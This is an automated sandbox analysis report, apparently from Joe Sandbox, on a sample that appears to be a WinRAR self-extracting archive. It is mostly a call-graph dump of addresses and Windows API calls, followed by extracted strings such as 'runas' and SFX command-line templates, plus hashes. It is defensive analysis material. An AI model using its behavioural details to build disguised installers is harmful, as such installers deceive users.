27258->27259 27264 7ff65594f6d5 27259->27264 27260 7ff65594f742 ShellExecuteExW 27261 7ff65594f846 27260->27261 27262 7ff65594f755 27260->27262 27261->27263 27269 7ff65594f8fb 27261->27269 27266 7ff65594f774 IsWindowVisible 27262->27266 27267 7ff65594f78e WaitForInputIdle 27262->27267 27271 7ff65594f7e3 CloseHandle 27262->27271 27263->27248 27264->27260 27265 7ff65592129c 33 API calls 27264->27265 27270 7ff65594f717 27265->27270 27266->27267 27272 7ff65594f781 ShowWindow 27266->27272 27268 7ff65594fe24 5 API calls 27267->27268 27273 7ff65594f7a6 27268->27273 27274 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27269->27274 27338 7ff655935b60 53 API calls 2 library calls 27270->27338 27276 7ff65594f7f2 27271->27276 27277 7ff65594f801 27271->27277 27272->27267 27273->27271 27281 7ff65594f7b4 GetExitCodeProcess 27273->27281 27278 7ff65594f900 27274->27278 27339 7ff6559413c4 CompareStringW 27276->27339 27277->27261 27285 7ff65594f837 ShowWindow 27277->27285 27279 7ff65594f725 27282 7ff655921fa0 31 API calls 27279->27282 27281->27271 27283 7ff65594f7c7 27281->27283 27284 7ff65594f72f 27282->27284 27283->27271 27284->27260 27285->27261 27286->27039 27287->27039 27288->27039 27289->27039 27290->27039 27291->27039 27292->26998 27293->27039 27294->27039 27295->27039 27296->27039 27298 7ff6559372ea 27297->27298 27340 7ff65592b3a8 27298->27340 27302 7ff6559331e7 DeleteFileW 27301->27302 27303 7ff6559331e4 27301->27303 27304 7ff6559331fd 27302->27304 27311 7ff65593327c 27302->27311 27303->27302 27306 7ff655936a0c 49 API calls 27304->27306 27305 7ff655952320 _handle_error 8 API calls 27307 7ff655933291 27305->27307 27308 7ff655933222 27306->27308 27307->27039 27309 7ff655933226 DeleteFileW 27308->27309 27310 7ff655933243 27308->27310 27309->27310 27310->27311 27312 7ff6559332a1 27310->27312 27311->27305 27313 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27312->27313 27314 7ff6559332a6 27313->27314 27316->27039 27317->27039 27318->27039 27319->27039 27320->27039 27321->27039 27324 7ff65593d25e 27322->27324 27323 7ff65593d292 27323->27023 27324->27323 27325 7ff655921744 33 API calls 27324->27325 27325->27324 27326->26957 27327->26945 27329->26926 27330->26929 27331->26931 27332->26982 27333->26973 27335->26978 27337->27253 27338->27279 27339->27277 27343 7ff65592b3f2 memcpy_s 27340->27343 27341 7ff655952320 _handle_error 8 API calls 27342 7ff65592b4b6 27341->27342 27342->27039 27343->27341 27400 7ff6559386ec 27344->27400 27346 7ff65592e3c4 27410 7ff65592e600 27346->27410 27348 7ff65592e4d4 27351 7ff6559521d0 33 API calls 27348->27351 27349 7ff65592e549 27352 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27349->27352 27350 7ff65592e454 27350->27348 27350->27349 27353 7ff65592e4f0 27351->27353 27360 7ff65592e54e 27352->27360 27416 7ff655943148 102 API calls 27353->27416 27355 7ff65592e51d 27356 7ff655952320 _handle_error 8 API calls 27355->27356 27357 7ff65592e52d 27356->27357 27357->27076 27358 7ff6559318c2 27359 7ff65593190d 27358->27359 27361 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27358->27361 27359->27076 27360->27358 27360->27359 27362 7ff655921fa0 31 API calls 27360->27362 27363 7ff65593193b 27361->27363 27362->27360 27367 7ff65592e7ea 27364->27367 27365 7ff65592e864 27368 7ff65592e993 27365->27368 27370 7ff65592e8a1 27365->27370 27367->27365 27367->27370 27429 7ff655933ec8 27367->27429 27371 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27368->27371 27369 7ff65592e900 27376 7ff65592e955 27369->27376 27472 7ff6559228a4 82 API calls 2 library calls 27369->27472 27370->27369 27436 7ff65592f578 27370->27436 27374 7ff65592e998 27371->27374 27373 7ff655952320 _handle_error 8 API calls 27375 7ff65592e97e 27373->27375 27378 7ff65592e578 27375->27378 27376->27373 28308 7ff6559315d8 27378->28308 27381 7ff65592e59e 27383 7ff655921fa0 31 API calls 27381->27383 27382 7ff655941870 108 API calls 27382->27381 27384 7ff65592e5b7 27383->27384 27385 7ff655921fa0 31 API calls 27384->27385 27386 7ff65592e5c3 27385->27386 27387 7ff655921fa0 31 API calls 27386->27387 27388 7ff65592e5cf 27387->27388 27389 7ff65593878c 108 API calls 27388->27389 27390 7ff65592e5db 27389->27390 27391 7ff655921fa0 31 API calls 27390->27391 27392 7ff65592e5e4 27391->27392 27393 7ff655921fa0 31 API calls 27392->27393 27394 7ff65592e5ed 27393->27394 27395 7ff6559318c2 27394->27395 27397 7ff65593190d 27394->27397 27398 7ff655921fa0 31 API calls 27394->27398 27396 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27395->27396 27395->27397 27399 7ff65593193b 27396->27399 27397->27080 27398->27394 27401 7ff65593870a 27400->27401 27402 7ff6559521d0 33 API calls 27401->27402 27403 7ff65593872f 27402->27403 27404 7ff655938743 27403->27404 27417 7ff655929f1c 27403->27417 27406 7ff6559521d0 33 API calls 27404->27406 27407 7ff655938759 27406->27407 27408 7ff65593876b 27407->27408 27409 7ff655929f1c 33 API calls 27407->27409 27408->27346 27409->27408 27411 7ff65592e627 27410->27411 27414 7ff65592e62c memcpy_s 27410->27414 27412 7ff655921fa0 31 API calls 27411->27412 27412->27414 27413 7ff655921fa0 31 API calls 27415 7ff65592e668 memcpy_s 27413->27415 27414->27413 27414->27415 27415->27350 27416->27355 27422 7ff6559524a0 27417->27422 27420 7ff6559524a0 33 API calls 27421 7ff655929f75 memcpy_s 27420->27421 27421->27404 27423 7ff6559524d1 27422->27423 27424 7ff655929f4a 27423->27424 27426 7ff655929fb0 27423->27426 27424->27420 27427 7ff65593b788 33 API calls 27426->27427 27428 7ff655929fc2 27427->27428 27428->27423 27430 7ff6559372cc 8 API calls 27429->27430 27431 7ff655933ee1 27430->27431 27435 7ff655933f0f 27431->27435 27473 7ff6559340bc 27431->27473 27434 7ff655933efa FindClose 27434->27435 27435->27367 27437 7ff65592f598 _snwprintf 27436->27437 27499 7ff655922950 27437->27499 27440 7ff65592f5cc 27444 7ff65592f5fc 27440->27444 27516 7ff6559233e4 27440->27516 27443 7ff65592f5f8 27443->27444 27548 7ff655923ad8 27443->27548 27759 7ff655922c54 27444->27759 27451 7ff65592f7cb 27558 7ff65592f8a4 27451->27558 27453 7ff655928d04 33 API calls 27454 7ff65592f662 27453->27454 27775 7ff655937918 48 API calls 2 library calls 27454->27775 27456 7ff65592f677 27457 7ff655933ec8 55 API calls 27456->27457 27465 7ff65592f6ad 27457->27465 27459 7ff65592f842 27459->27444 27579 7ff6559269f8 27459->27579 27590 7ff65592f930 27459->27590 27464 7ff65592f89a 27469 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27464->27469 27465->27464 27466 7ff65592f74d 27465->27466 27468 7ff655933ec8 55 API calls 27465->27468 27776 7ff655937918 48 API calls 2 library calls 27465->27776 27466->27451 27466->27464 27467 7ff65592f895 27466->27467 27470 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27467->27470 27468->27465 27471 7ff65592f8a0 27469->27471 27470->27464 27472->27376 27474 7ff6559340f9 FindFirstFileW 27473->27474 27475 7ff6559341d2 FindNextFileW 27473->27475 27478 7ff6559341f3 27474->27478 27479 7ff65593411e 27474->27479 27477 7ff6559341e1 GetLastError 27475->27477 27475->27478 27497 7ff6559341c0 27477->27497 27480 7ff655934211 27478->27480 27483 7ff6559220b0 33 API calls 27478->27483 27481 7ff655936a0c 49 API calls 27479->27481 27488 7ff65592129c 33 API calls 27480->27488 27482 7ff655934144 27481->27482 27485 7ff655934148 FindFirstFileW 27482->27485 27486 7ff655934167 27482->27486 27483->27480 27484 7ff655952320 _handle_error 8 API calls 27487 7ff655933ef4 27484->27487 27485->27486 27486->27478 27490 7ff6559341af GetLastError 27486->27490 27493 7ff655934314 27486->27493 27487->27434 27487->27435 27489 7ff65593423b 27488->27489 27491 7ff655938090 47 API calls 27489->27491 27490->27497 27492 7ff655934249 27491->27492 27496 7ff65593430f 27492->27496 27492->27497 27494 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27493->27494 27495 7ff65593431a 27494->27495 27498 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27496->27498 27497->27484 27498->27493 27500 7ff65592296c 27499->27500 27501 7ff655929f1c 33 API calls 27500->27501 27502 7ff655922980 27501->27502 27503 7ff6559386ec 33 API calls 27502->27503 27504 7ff65592298d 27503->27504 27505 7ff6559521d0 33 API calls 27504->27505 27509 7ff655922ac2 27504->27509 27507 7ff655922ab0 27505->27507 27507->27509 27510 7ff6559291c8 35 API calls 27507->27510 27777 7ff655934d04 27509->27777 27510->27509 27511 7ff655932ca8 27515 7ff6559324c0 54 API calls 27511->27515 27512 7ff655932cc1 27513 7ff655932cc5 27512->27513 27791 7ff65592b7e8 99 API calls 2 library calls 27512->27791 27513->27440 27515->27512 27544 7ff6559328d0 104 API calls 27516->27544 27517 7ff655923674 27792 7ff6559228a4 82 API calls 2 library calls 27517->27792 27518 7ff655923431 memcpy_s 27525 7ff65592344e 27518->27525 27529 7ff655923601 27518->27529 27541 7ff655932bb0 101 API calls 27518->27541 27520 7ff6559269f8 132 API calls 27522 7ff655923682 27520->27522 27521 7ff6559234cc 27545 7ff6559328d0 104 API calls 27521->27545 27522->27520 27523 7ff65592370c 27522->27523 27522->27529 27546 7ff655932aa0 101 API calls 27522->27546 27527 7ff655923740 27523->27527 27523->27529 27793 7ff6559228a4 82 API calls 2 library calls 27523->27793 27525->27517 27525->27522 27526 7ff6559235cb 27526->27525 27528 7ff6559235d7 27526->27528 27527->27529 27532 7ff65592384d 27527->27532 27547 7ff655932bb0 101 API calls 27527->27547 27528->27529 27530 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27528->27530 27529->27443 27533 7ff655923891 27530->27533 27531 7ff6559234eb 27531->27526 27543 7ff655932aa0 101 API calls 27531->27543 27532->27529 27534 7ff6559220b0 33 API calls 27532->27534 27533->27443 27534->27529 27535 7ff6559269f8 132 API calls 27537 7ff65592378e 27535->27537 27536 7ff6559235a7 27536->27526 27539 7ff6559328d0 104 API calls 27536->27539 27537->27535 27538 7ff655923803 27537->27538 27540 7ff655932aa0 101 API calls 27537->27540 27542 7ff655932aa0 101 API calls 27538->27542 27539->27526 27540->27537 27541->27521 27542->27532 27543->27536 27544->27518 27545->27531 27546->27522 27547->27537 27549 7ff655923af9 27548->27549 27555 7ff655923b55 27548->27555 27794 7ff655923378 27549->27794 27551 7ff655952320 _handle_error 8 API calls 27553 7ff655923b67 27551->27553 27553->27451 27553->27453 27554 7ff655923b6c 27556 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27554->27556 27555->27551 27557 7ff655923b71 27556->27557 27960 7ff65593886c 27558->27960 27560 7ff65592f8ba 27964 7ff65593ef60 GetSystemTime SystemTimeToFileTime 27560->27964 27563 7ff655940994 27564 7ff655950340 27563->27564 27565 7ff655937df4 47 API calls 27564->27565 27566 7ff655950373 27565->27566 27567 7ff65593aae0 48 API calls 27566->27567 27568 7ff655950387 27567->27568 27569 7ff65593da98 48 API calls 27568->27569 27570 7ff655950397 27569->27570 27571 7ff655921fa0 31 API calls 27570->27571 27572 7ff6559503a2 27571->27572 27973 7ff65594fc68 49 API calls 2 library calls 27572->27973 27574 7ff6559503b8 27575 7ff655921fa0 31 API calls 27574->27575 27576 7ff6559503c3 27575->27576 27577 7ff655952320 _handle_error 8 API calls 27576->27577 27578 7ff6559503d0 27577->27578 27578->27459 27580 7ff655926a0a 27579->27580 27581 7ff655926a0e 27579->27581 27580->27459 27589 7ff655932bb0 101 API calls 27581->27589 27582 7ff655926a1b 27583 7ff655926a2f 27582->27583 27584 7ff655926a3e 27582->27584 27583->27580 27974 7ff655925e24 27583->27974 28036 7ff655925130 130 API calls 2 library calls 27584->28036 27587 7ff655926a3c 27587->27580 28037 7ff65592466c 82 API calls 27587->28037 27589->27582 27591 7ff65592f978 27590->27591 27595 7ff65592f9b0 27591->27595 27648 7ff65592fa34 27591->27648 28151 7ff65594612c 137 API calls 3 library calls 27591->28151 27593 7ff655931189 27596 7ff6559311e1 27593->27596 27597 7ff65593118e 27593->27597 27594 7ff655952320 _handle_error 8 API calls 27598 7ff6559311c4 27594->27598 27595->27593 27601 7ff65592f9d0 27595->27601 27595->27648 27596->27648 28204 7ff65594612c 137 API calls 3 library calls 27596->28204 27597->27648 28203 7ff65592dd08 179 API calls 27597->28203 27598->27459 27601->27648 28066 7ff655929bb0 27601->28066 27603 7ff65592fad6 28079 7ff655935ef8 27603->28079 27606 7ff65592fb7a 27758 7ff655932aa0 101 API calls 27606->27758 27608 7ff65592fb5e 27608->27606 28153 7ff655937c94 47 API calls 2 library calls 27608->28153 27648->27594 27760 7ff655922c88 27759->27760 27761 7ff655922c74 27759->27761 27762 7ff655921fa0 31 API calls 27760->27762 27761->27760 28303 7ff655922d80 31 API calls _invalid_parameter_noinfo_noreturn 27761->28303 27766 7ff655922ca1 27762->27766 27765 7ff655922d08 27768 7ff655923090 31 API calls 27765->27768 27774 7ff655922d2c 27766->27774 28289 7ff655923090 27766->28289 27767 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27769 7ff655922d7c 27767->27769 27770 7ff655922d14 27768->27770 27771 7ff655921fa0 31 API calls 27770->27771 27772 7ff655922d20 27771->27772 28297 7ff65593878c 27772->28297 27774->27767 27775->27456 27776->27465 27778 7ff655934d32 memcpy_s 27777->27778 27787 7ff655934bac 27778->27787 27780 7ff655934d54 27781 7ff655934d90 27780->27781 27783 7ff655934dae 27780->27783 27782 7ff655952320 _handle_error 8 API calls 27781->27782 27784 7ff655922b32 27782->27784 27785 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27783->27785 27784->27440 27784->27511 27786 7ff655934db3 27785->27786 27788 7ff655934c27 27787->27788 27790 7ff655934c2f memcpy_s 27787->27790 27789 7ff655921fa0 31 API calls 27788->27789 27789->27790 27790->27780 27791->27513 27792->27529 27793->27527 27795 7ff655923396 27794->27795 27796 7ff65592339a 27794->27796 27795->27554 27795->27555 27800 7ff655923294 27796->27800 27799 7ff655932aa0 101 API calls 27799->27795 27801 7ff6559232f6 27800->27801 27802 7ff6559232bb 27800->27802 27808 7ff655926e74 27801->27808 27803 7ff6559269f8 132 API calls 27802->27803 27806 7ff6559232db 27803->27806 27806->27799 27812 7ff655926e95 27808->27812 27809 7ff6559269f8 132 API calls 27809->27812 27810 7ff65592331d 27810->27806 27813 7ff655923904 27810->27813 27812->27809 27812->27810 27840 7ff65593e808 27812->27840 27848 7ff655926a7c 27813->27848 27816 7ff65592396a 27819 7ff655923989 27816->27819 27820 7ff65592399a 27816->27820 27817 7ff655923a8a 27821 7ff655952320 _handle_error 8 API calls 27817->27821 27880 7ff655940d54 27819->27880 27823 7ff6559239ec 27820->27823 27824 7ff6559239a3 27820->27824 27822 7ff655923a9e 27821->27822 27822->27806 27886 7ff6559226b4 33 API calls memcpy_s 27823->27886 27885 7ff655940c80 33 API calls 27824->27885 27825 7ff655923ab3 27827 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27825->27827 27830 7ff655923ab8 27827->27830 27833 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27830->27833 27831 7ff6559239b0 27834 7ff655921fa0 31 API calls 27831->27834 27838 7ff6559239c0 memcpy_s 27831->27838 27832 7ff655923a13 27887 7ff655940ae8 34 API calls _invalid_parameter_noinfo_noreturn 27832->27887 27837 7ff655923abe 27833->27837 27834->27838 27835 7ff655921fa0 31 API calls 27839 7ff65592394f 27835->27839 27838->27835 27839->27817 27839->27825 27839->27830 27841 7ff65593e811 27840->27841 27842 7ff65593e82b 27841->27842 27846 7ff65592b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27841->27846 27844 7ff65593e845 SetThreadExecutionState 27842->27844 27847 7ff65592b664 RtlPcToFileHeader RaiseException Concurrency::cancel_current_task 27842->27847 27846->27842 27847->27844 27849 7ff655926a96 _snwprintf 27848->27849 27850 7ff655926ae4 27849->27850 27851 7ff655926ac4 27849->27851 27852 7ff655926d4d 27850->27852 27856 7ff655926b0f 27850->27856 27924 7ff6559228a4 82 API calls 2 library calls 27851->27924 27934 7ff6559228a4 82 API calls 2 library calls 27852->27934 27855 7ff655926ad0 27857 7ff655952320 _handle_error 8 API calls 27855->27857 27856->27855 27888 7ff655941f94 27856->27888 27858 7ff65592394b 27857->27858 27858->27816 27858->27839 27884 7ff655922794 33 API calls __std_swap_ranges_trivially_swappable 27858->27884 27861 7ff655926b85 27862 7ff655926c2a 27861->27862 27879 7ff655926b7b 27861->27879 27930 7ff655938968 109 API calls 27861->27930 27897 7ff655934760 27862->27897 27863 7ff655926b6e 27925 7ff6559228a4 82 API calls 2 library calls 27863->27925 27864 7ff655926b80 27864->27861 27926 7ff6559240b0 27864->27926 27870 7ff655926c52 27871 7ff655926cc7 27870->27871 27872 7ff655926cd1 27870->27872 27901 7ff655931794 27871->27901 27931 7ff655941f20 151 API calls 2 library calls 27872->27931 27875 7ff655926ccf 27932 7ff655934700 8 API calls _handle_error 27875->27932 27877 7ff655926cfd 27877->27879 27933 7ff65592433c 82 API calls 2 library calls 27877->27933 27916 7ff655941870 27879->27916 27881 7ff655940d8c 27880->27881 27882 7ff655940f48 27881->27882 27883 7ff655921744 33 API calls 27881->27883 27882->27839 27883->27881 27884->27816 27885->27831 27886->27832 27887->27839 27889 7ff655942056 std::bad_alloc::bad_alloc 27888->27889 27892 7ff655941fc5 std::bad_alloc::bad_alloc 27888->27892 27891 7ff655954078 Concurrency::cancel_current_task 2 API calls 27889->27891 27890 7ff655926b59 27890->27861 27890->27863 27890->27864 27891->27892 27892->27890 27893 7ff655954078 Concurrency::cancel_current_task 2 API calls 27892->27893 27894 7ff65594200f std::bad_alloc::bad_alloc 27892->27894 27893->27894 27894->27890 27895 7ff655954078 Concurrency::cancel_current_task 2 API calls 27894->27895 27896 7ff6559420a9 27895->27896 27898 7ff655934780 27897->27898 27900 7ff65593478a 27897->27900 27899 7ff6559521d0 33 API calls 27898->27899 27899->27900 27900->27870 27902 7ff6559317be memcpy_s 27901->27902 27935 7ff655938a48 27902->27935 27904 7ff655931856 27904->27875 27905 7ff655931830 27905->27904 27908 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27905->27908 27907 7ff655938a48 146 API calls 27909 7ff6559317f2 27907->27909 27909->27905 27909->27907 27945 7ff655938c4c 27909->27945 27917 7ff65594188e 27916->27917 27921 7ff6559418a1 27917->27921 27951 7ff65593e948 27917->27951 27919 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27920 7ff655941ad0 27919->27920 27923 7ff655941a37 27921->27923 27958 7ff65593a984 31 API calls _invalid_parameter_noinfo_noreturn 27921->27958 27923->27919 27924->27855 27925->27879 27927 7ff6559240dd 27926->27927 27929 7ff6559240d7 memcpy_s 27926->27929 27927->27929 27959 7ff655924120 33 API calls 2 library calls 27927->27959 27929->27861 27930->27862 27931->27875 27932->27877 27933->27879 27934->27855 27937 7ff655938bcd 27935->27937 27941 7ff655938a91 memcpy_s 27935->27941 27936 7ff655938c1a 27938 7ff65593e808 SetThreadExecutionState RtlPcToFileHeader RaiseException 27936->27938 27937->27936 27939 7ff65592a174 8 API calls 27937->27939 27942 7ff655938c1f 27938->27942 27939->27936 27940 7ff65594612c 137 API calls 27940->27941 27941->27937 27941->27940 27941->27942 27943 7ff655934888 108 API calls 27941->27943 27944 7ff6559328d0 104 API calls 27941->27944 27942->27909 27943->27941 27944->27941 27946 7ff655938c8b 27945->27946 27952 7ff65593ecd8 103 API calls 27951->27952 27953 7ff65593e95f ReleaseSemaphore 27952->27953 27954 7ff65593e984 27953->27954 27955 7ff65593e9a3 DeleteCriticalSection CloseHandle CloseHandle 27953->27955 27956 7ff65593ea5c 101 API calls 27954->27956 27957 7ff65593e98e FindCloseChangeNotification 27956->27957 27957->27954 27957->27955 27958->27923 27961 7ff655938882 27960->27961 27962 7ff655938892 27960->27962 27967 7ff6559323f0 27961->27967 27962->27560 27965 7ff655952320 _handle_error 8 API calls 27964->27965 27966 7ff65592f7dc 27965->27966 27966->27459 27966->27563 27968 7ff65593240f 27967->27968 27972 7ff655932aa0 101 API calls 27968->27972 27969 7ff655932428 27971 7ff655932bb0 101 API calls 27969->27971 27970 7ff655932438 27970->27962 27971->27970 27972->27969 27973->27574 27975 7ff655925e67 27974->27975 28038 7ff6559385f0 27975->28038 27977 7ff655926134 28048 7ff655926fcc 82 API calls 27977->28048 27979 7ff65592613c 27981 7ff6559269af 27979->27981 27984 7ff6559269e4 27979->27984 27992 7ff6559269ef 27979->27992 27980 7ff655952320 _handle_error 8 API calls 27983 7ff6559269c3 27980->27983 27981->27980 27982 7ff655926973 28060 7ff65592466c 82 API calls 27982->28060 27983->27587 27986 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27984->27986 27985 7ff65592612e 27985->27977 27985->27982 27989 7ff6559385f0 104 API calls 27985->27989 27988 7ff6559269e9 27986->27988 27990 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27988->27990 27991 7ff6559261a4 27989->27991 27990->27992 27991->27977 27995 7ff6559261ac 27991->27995 27993 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 27992->27993 27994 7ff6559269f5 27993->27994 27996 7ff65592623f 27995->27996 28049 7ff65592466c 82 API calls 27995->28049 27996->27982 27998 7ff655926266 27996->27998 28001 7ff6559268b7 27998->28001 28002 7ff6559262ce 27998->28002 28004 7ff655934d04 31 API calls 28001->28004 28003 7ff655926481 28002->28003 28006 7ff6559262e0 28002->28006 28006->27979 28036->27587 28039 7ff65593869a 28038->28039 28040 7ff655938614 28038->28040 28042 7ff6559240b0 33 API calls 28039->28042 28045 7ff65593867c 28039->28045 28041 7ff6559240b0 33 API calls 28040->28041 28040->28045 28043 7ff65593864d 28041->28043 28044 7ff6559386b3 28042->28044 28061 7ff65592a174 28043->28061 28047 7ff6559328d0 104 API calls 28044->28047 28045->27985 28047->28045 28048->27979 28062 7ff65592a185 28061->28062 28063 7ff65592a19a 28062->28063 28065 7ff65593af18 8 API calls 2 library calls 28062->28065 28063->28045 28065->28063 28074 7ff655929be7 28066->28074 28067 7ff655929c1b 28068 7ff655952320 _handle_error 8 API calls 28067->28068 28069 7ff655929c9d 28068->28069 28069->27603 28071 7ff655929c83 28072 7ff655921fa0 31 API calls 28071->28072 28072->28067 28074->28067 28074->28071 28075 7ff655929cae 28074->28075 28205 7ff655935294 28074->28205 28223 7ff65593db60 28074->28223 28076 7ff655929cbf 28075->28076 28227 7ff65593da48 CompareStringW 28075->28227 28076->28071 28078 7ff6559220b0 33 API calls 28076->28078 28078->28071 28090 7ff655935f3a 28079->28090 28080 7ff65593619b 28082 7ff655952320 _handle_error 8 API calls 28080->28082 28081 7ff6559361ce 28231 7ff65592704c 47 API calls memcpy_s 28081->28231 28084 7ff65592fb29 28082->28084 28084->27606 28152 7ff655937c94 47 API calls 2 library calls 28084->28152 28085 7ff6559361d4 28086 7ff65592129c 33 API calls 28087 7ff655936129 28086->28087 28088 7ff655921fa0 31 API calls 28087->28088 28089 7ff65593613b memcpy_s 28087->28089 28088->28089 28089->28080 28091 7ff6559361c9 28089->28091 28090->28080 28090->28081 28090->28086 28092 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 28091->28092 28092->28081 28151->27595 28152->27608 28153->27606 28203->27648 28204->27648 28206 7ff6559352d4 28205->28206 28211 7ff655935312 __vcrt_FlsAlloc 28206->28211 28216 7ff655935339 __vcrt_FlsAlloc 28206->28216 28228 7ff6559413f4 CompareStringW 28206->28228 28207 7ff655952320 _handle_error 8 API calls 28209 7ff655935503 28207->28209 28209->28074 28212 7ff655935382 __vcrt_FlsAlloc 28211->28212 28211->28216 28229 7ff6559413f4 CompareStringW 28211->28229 28213 7ff65592129c 33 API calls 28212->28213 28214 7ff655935439 28212->28214 28212->28216 28215 7ff655935426 28213->28215 28217 7ff655935489 28214->28217 28219 7ff65593551b 28214->28219 28218 7ff6559372cc 8 API calls 28215->28218 28216->28207 28217->28216 28230 7ff6559413f4 CompareStringW 28217->28230 28218->28214 28221 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 28219->28221 28222 7ff655935520 28221->28222 28225 7ff65593db73 28223->28225 28224 7ff65593db91 28224->28074 28225->28224 28226 7ff6559220b0 33 API calls 28225->28226 28226->28224 28227->28076 28228->28211 28229->28212 28230->28216 28231->28085 28290 7ff655921fa0 31 API calls 28289->28290 28291 7ff6559230a5 28290->28291 28292 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 28291->28292 28293 7ff6559230fd 28292->28293 28294 7ff65593b825 28293->28294 28295 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 28293->28295 28294->27765 28296 7ff65593b846 28295->28296 28301 7ff6559387af 28297->28301 28299 7ff655938845 28300 7ff65593461c 108 API calls 28299->28300 28302 7ff655938851 28300->28302 28304 7ff65593461c 28301->28304 28303->27760 28305 7ff655934632 28304->28305 28307 7ff65593463a 28304->28307 28306 7ff65593e948 108 API calls 28305->28306 28306->28307 28307->28299 28309 7ff65593163e 28308->28309 28310 7ff655931681 28308->28310 28309->28310 28314 7ff6559331bc 51 API calls 28309->28314 28311 7ff6559316a0 28310->28311 28312 7ff655921fa0 31 API calls 28310->28312 28313 7ff65592e600 31 API calls 28311->28313 28312->28310 28317 7ff6559316de 28313->28317 28314->28309 28315 7ff65593175b 28318 7ff655952320 _handle_error 8 API calls 28315->28318 28316 7ff65593178d 28320 7ff655957904 _invalid_parameter_noinfo_noreturn 31 API calls 28316->28320 28317->28315 28317->28316 28319 7ff65592e58a 28318->28319 28319->27381 28319->27382 28321 7ff655931792 28320->28321 28322->27092 28323->27098 28324->27101 28325 7ff655951491 28326 7ff6559513c9 28325->28326 28327 7ff655951900 _com_raise_error 14 API calls 28326->28327 28327->28326

                                                                                Executed Functions

                                                                                Function 00007FF65594B190 Relevance: 125.7, APIs: 61, Strings: 10, Instructions: 1421windowfilesleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: Item$_invalid_parameter_noinfo_noreturn$Message$DialogText$ButtonChecked$FileSend$ErrorLast$CloseFindFocusLoadStringView$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleIdleInputLineMappingParamShellSleepTickTranslateUnmapWaitWindow
                                                                                • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
                                                                                • API String ID: 2128803032-2702805183
                                                                                • Opcode ID: 01a438109652fbf301756464df9dbc0de690b25f660d933aded9320d3491b7ef
                                                                                • Instruction ID: e8838d2247371789dbe572081310e4de0992055d66bdcd6e5645889b015dcecf
                                                                                • Opcode Fuzzy Hash: 01a438109652fbf301756464df9dbc0de690b25f660d933aded9320d3491b7ef
                                                                                • Instruction Fuzzy Hash: 7AD2E36AA087C285EA20DB25E8582F96351FF85F88F484135D99DB7AA7DF3CED44C340
                                                                                Function 00007FF65594CE88 Relevance: 66.7, APIs: 27, Strings: 10, Instructions: 1963fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1738104242.00007FF655921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF655920000, based on PE: true
                                                                                • Associated: 00000000.00000002.1738088681.00007FF655920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738135407.00007FF655968000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF65597B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738210490.00007FF655984000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1738288233.00007FF65598E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_7ff655920000_h2UFp4aCRq.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskFile$ButtonCheckedMove$DialogItemOperationPathTemp
